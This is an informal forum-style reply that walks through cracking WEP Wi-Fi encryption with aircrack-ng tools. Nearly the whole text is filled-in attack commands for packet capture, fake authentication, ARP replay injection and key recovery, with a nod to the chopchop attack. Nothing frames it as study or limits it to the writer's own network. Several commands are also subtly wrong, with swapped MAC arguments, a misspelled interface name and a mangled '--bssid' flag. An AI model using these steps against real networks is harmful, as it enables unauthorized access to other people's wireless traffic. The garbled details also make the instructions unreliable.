why are you making a complicated dump file. the key to getting started with wep cracking is to keep it as symple as possable i use the AP name as a dump file. my script is:
airodump-ng -c {channel} -w {network name} {interface}
but make sure you have the correct spaces in between. if i was attaking channel 11 it would look like this.
airodump-ng -c 11 -w NETGEAR eht1
then move on to .
aireplay-ng -1 30 -e {network name} -a {your mac} -h {AP MAC} {interface}
my one look’s like this.
aireplay-ng -1 30 -e NETGEAR -a 00:11:22:33:44:55 -h 00:00:00:00:00:00 eth1
if all is good
aireplay-ng -3 -b {AP mac} -h {your mac} -x 900 eth1
my one look’s like this.
aireplay-ng -3 -b 00:11:22:33:44:55 -h 00:00:00:00:00:00 -x 900 eth1
now airodump-ng data should be going crazzzzzzy and aircrack-ng is simple
aircrack-ng -n 64 –bssid {AP MAC} {network name}*.cap
hear is my one.
aircrack-ng -n 64 –bssid 00:11:22:33:44:55 NETGEAR*.cap
the 64 can be changed for 128 depending on the bit of encriptoin
possable reasons for data not rising is no client on the network. this is the simpleist wy of cracking wep but you need to have a client on the network. i use the chopchop attake i find it far better and there is no need to have a client on the network. hope this help’s you. hay what do i know im just a newbe